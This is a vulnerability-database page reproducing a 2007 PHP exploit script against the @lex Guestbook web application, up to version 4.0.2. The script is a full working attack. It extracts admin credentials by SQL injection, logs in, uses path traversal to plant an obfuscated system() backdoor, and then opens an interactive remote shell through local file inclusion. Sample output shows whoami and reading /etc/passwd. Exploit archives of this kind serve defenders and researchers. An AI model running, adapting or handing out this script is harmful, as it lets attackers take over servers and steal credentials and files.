Vulners
Lucene search
guest402.txt
`#!/usr/bin/php
<?php
/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");
/*/
|
| header> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit
| header> ========================================================
| status> Retrieving the administrator password
| sploit> AdminUsername::root
| sploit> AdminPassword::toor
| status> Trying to get logged in
| sploit> Done
| status> Trying to add a skin
| sploit> Done
| status> Writing the malicious skin
| $shell> whoami
| darkfig
|
| $shell> cat /etc/passwd ...
|
/*/
if($argc < 2)
{
print "\n---------------------------------------------------------";
print "\nAffected.scr..: @lex Guestbook <= 4.0.2"; // last version
print "\nPoc.ID........: 20070107";
print "\nType..........: PHP Code Execution";
print "\nRisk.level....: High";
print "\nSrc.download..: www.alexphpteam.com";
print "\nPoc.link......: acid-root.new.fr/poc/20070107.txt";
print "\nCredits.......: DarkFig";
print "\n---------------------------------------------------------";
print "\nUsage.........: php xpl.php <url>";
print "\nProxyOptions..: <proxhost:proxport> <proxuser:proxpass>";
print "\nExample.......: php xpl.php http://victim.com/@lexgb/";
print "\n---------------------------------------------------------\n";
exit(1);
}
$url=$argv[1];
$prs=$argv[2];
$pra=$argv[3];
$xpl = new phpsploit();
$xpl->agent("Sploitzilla");
if(!empty($prs)) $xpl->proxy($prs);
if(!empty($pra)) $xpl->proxyauth($pra);
/*/
|
| index.php
| =========
| ... include($chem_absolu."include/livre_include.".$alex_livre_ext);
|
|
| livre_include.php -> Local File Inclusion
| =================
| ... set_magic_quotes_runtime(0); // thx =)
| ... if (isset($_GET['lang']) && $_GET['lang'] && file_exists($chem_absolu."languages/".$_GET['lang'].".".$alex_livre_ext))
| $f_language = str_replace("..","",$_GET['lang']); // We can't use .... because of file_exists() verification but ... =]
| include($chem_absolu."languages/".$f_language.".".$alex_livre_ext);
|
|
| index.php -> SQL Injection
| =========
| ... sql_select_query("msg", "alex_livre_txt_lang", "WHERE lang='".$f_language."' and `type`='titre'");
| // "SELECT msg FROM `alex_livre_txt_lang` WHERE lang='$f_language' and type=`titre`
|
/*/
$sql = "index.php?lang=english.php%00'%20union%20select%20".
"concat('XPLLogin:',(select%20login%20from%20alex_livr".
"e_users%20LIMIT%201),'XPLPass:',(select%20pass%20from".
"%20alex_livre_users%20LIMIT%201))/*";
print "\nheader> @lex Guestbook <= 4.0.2 Remote Command Execution Exploit";
print "\nheader> ========================================================";
print "\nstatus> Retrieving the administrator password";
$xpl->get($url.$sql);
if(preg_match('#<div class="d_title">XPLLogin:(.*)XPLPass:(.*)</div>#',$xpl->getcontent(),$count))
print "\nsploit> AdminUsername::".$count[1]."\nsploit> AdminPassword::".$count[2];
else die("\nsploit> Exploit failed");
print "\nstatus> Trying to get logged in";
$xpl->post($url."admin/index.php","f_login=".$count[1]."&f_pass=".$count[2]."&f_identif=Identification");
if(preg_match("#f_cadres\.php\?f_sid=([a-z0-9]{32})#",$xpl->getheader(),$sid)) print "\nsploit> Done";
else die("\nsploit> Exploit failed");
print "\nstatus> Trying to add a skin";
// skins.php ... @mkdir($chem_absolu."templates/skins/".$_POST['aj_skin']."/", 0755)
$xpl->post($url."admin/skins.php?f_sid=".$sid[1],"aj_skin=../../languages/d4h4x0rskin&ajouter=Ajouter");
if(!preg_match('#alert\("ERREUR\n#',$xpl->getcontent())) print "\nsploit> Done";
else die("\nsploit> Exploit failed");
$scode = "chr(0x73).chr(0x79).chr(0x73).chr(0x74).chr(0x65).chr(0x6d).".
"chr(0x28).chr(0x73).chr(0x74).chr(0x72).chr(0x69).chr(0x70).".
"chr(0x73).chr(0x6c).chr(0x61).chr(0x73).chr(0x68).chr(0x65).".
"chr(0x73).chr(0x28).chr(0x24).chr(0x5f).chr(0x53).chr(0x45).".
"chr(0x52).chr(0x56).chr(0x45).chr(0x52).chr(0x5b).chr(0x27).".
"chr(0x48).chr(0x54).chr(0x54).chr(0x50).chr(0x5f).chr(0x52).".
"chr(0x45).chr(0x46).chr(0x45).chr(0x52).chr(0x45).chr(0x52).".
"chr(0x27).chr(0x5d).chr(0x29).chr(0x29).chr(0x3b)";
$data = "skin_edit=skins.php%3Ff_sid%3D".$sid[1]."%26skin_edit".
"%3D../../languages/d4h4x0rskin&alex_livre=<?php\r\n@e".
"val($scode);exit(0);\r\n?>&add_message=&nb_message_pa".
"ge=&list_pages=&corps_messages=&space=&assembly=&enre".
"gistrer=Enregistrer";
print "\nstatus> Writing the malicious skin\n\$shell> ";
// skins.php ... write($chem_absolu."templates/skins/".$_GET['skin_edit']."/".$tab_template_guestbook[$i])
$xpl->post($url."admin/skins.php?skin_edit=../../languages/d4h4x0rskin&f_sid=".$sid[1],$data);
while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
$xpl->addheader("Referer",$cmd);
$xpl->get($url."index.php?lang=d4h4x0rskin/alex_livre.css%00");
print $xpl->getcontent();
print "\n\$shell> ";
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4